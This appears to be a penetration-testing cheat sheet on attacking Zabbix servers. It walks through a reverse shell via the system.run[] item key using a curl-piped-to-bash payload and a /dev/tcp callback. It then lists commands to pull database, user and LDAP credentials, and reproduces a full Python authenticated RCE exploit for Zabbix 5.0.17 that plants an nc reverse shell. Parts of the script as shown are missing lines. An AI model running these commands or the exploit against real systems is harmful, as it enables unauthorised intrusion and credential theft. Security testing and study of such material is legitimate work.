- Credits to riosmara.com
- Credits to [telegra.ph](- https://telegra.ph/zametki-pro-zabbix-02-27)
- Credits to ppn.snovvcrash.com
Exploit Zabbix for a Reverse Shell
One of the interesting Key is allowing us to run command on the Zabbix server which isย system.run[]
We can exploit the above feature to run our payload on the zabbix server. With the below command basically that it will run curl and connect to our attacking server and open index.html by default where the output of the index.html will be piped to bash.
Write the payload
- Create the
and put our reverse shell payload. You can execute this command on your terminal console to write the payload intoindex.html
echo '/bin/bash -c "bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1"' > index.html
- Start a listener
- Run the exploit in Zabbix Item. You need to create a new item for the zabbix and put the payload that I mentioned earlier in the โKeyโ field:
To execute the command above, then you need to press the โTestโ button that is place on the bottom of the page:
The next things to do is to push theย โGet value and testโย button to run execute the curl command on the zabbix server:
As you can see that when you press the get value button then it connects to the http server because of curl is triggered. When the index.html has been read and the payload in the index.html is piped to bash to chain the execution to run the payload directly where eventually the reverse connection is established as shown in the picture 3:
Grab DB creds
cat /etc/zabbix/zabbix_server.conf | grep '^DB'
Grab local creds
psql postgresql://Admin:zabbix@localhost/zabbix -c 'select userid, alias, name, surname, passwd, attempt_ip from users'
Grab LDAP creds
$ psql postgresql://Admin:zabbix@localhost/zabbix -c 'select ldap_host, ldap_port, ldap_base_dn, ldap_bind_dn, ldap_bind_password from config'
RCE (authenticated)
# Exploit Title: Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)
# Date: 9/3/2022
# Exploit Author: Hussien Misbah
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/rn/rn5.0.17
# Version: 5.0.17
# Tested on: Linux
# Reference: https://github.com/HussienMisbah/tools/tree/master/Zabbix_exploit
# note : this is blind RCE so don't expect to see results on the site
# this exploit is tested against Zabbix 5.0.17 only
import sys
import requests
import re
import random
import string
import colorama
from colorama import Fore
print(Fore.YELLOW+"[*] this exploit is tested against Zabbix 5.0.17 only")
print(Fore.YELLOW+"[*] can reach the author @ https://hussienmisbah.github.io/")
def item_name() :
letters = string.ascii_letters
item = ''.join(random.choice(letters) for i in range(20))
return item
if len(sys.argv) != 6 :
print(Fore.RED +"[!] usage : ./expoit.py <target url> <username> <password> <attacker ip> <attacker port>")
url = sys.argv[1]
username =sys.argv[2]
password = sys.argv[3]
host = sys.argv[4]
port = sys.argv[5]
s = requests.Session()
headers ={
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
data = {
"name" : username ,
"password" : password ,
"autologin" :"1" ,
proxies = {
'http': ''
r = s.post(url+"/index.php",data=data) #proxies=proxies)
if "Sign out" not in r.text :
print(Fore.RED +"[!] Authentication failed")
if "Zabbix 5.0.17" not in r.text :
print(Fore.RED +"[!] This is not Zabbix 5.0.17")
if "filter_hostids%5B0%5D=" in r.text :
try :
x = re.search('filter_hostids%5B0%5D=(.*?)"', r.text)
hostId = x.group(1)
except :
print(Fore.RED +"[!] Exploit failed to resolve HostID")
print(Fore.BLUE +"[?] you can find it under /items then add item")
else :
print(Fore.RED +"[!] Exploit failed to resolve HostID")
print(Fore.BLUE +"[?] you can find HostID under /items then add item")
sid= re.search('<meta name="csrf-token" content="(.*)"/>',r.text).group(1) # hidden_csrf_token
command=f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {host} {port} >/tmp/f"
payload = f"system.run[{command},nowait]"
Random_name = item_name()
data2 ={
r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"} )
no_pages= r2.text.count("?page=")
#################################################[Searching in all pages for the uploaded item]#################################################
page = 1
while page <= no_pages :
r_page=s.get(url+f"/items.php?page={page}" ,headers=headers )
if Random_name in r_page.text :
print(Fore.GREEN+"[+] the payload has been Uploaded Successfully")
x2 = re.search(rf"(\d+)[^\d]>{Random_name}",r_page.text)
try :
except :
print(Fore.GREEN+f"[+] you should find it at {url}/items.php?form=update&hostid={hostId}&itemid={itemId}")
else :
page +=1
if flag==False :
print(Fore.BLUE +"[?] do you know you can't upload same key twice ?")
print(Fore.BLUE +"[?] maybe it is already uploaded so set the listener and wait 1m")
print(Fore.BLUE +"[*] change the port and try again")
#################################################[Executing the item]#################################################
data2["form"] ="update"
data2["selectedInterfaceId"] = "1"
print(Fore.GREEN+f"[+] set the listener at {port} please...")
r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"}) # ,proxies=proxies )
print(Fore.BLUE+ "[?] note : it takes up to +1 min so be patient :)")
answer =input(Fore.BLUE+"[+] got a shell ? [y]es/[N]o: ")
if "y" in answer.lower() :
print(Fore.GREEN+"Nice !")
else :
print(Fore.RED+"[!] if you find out why please contact me ")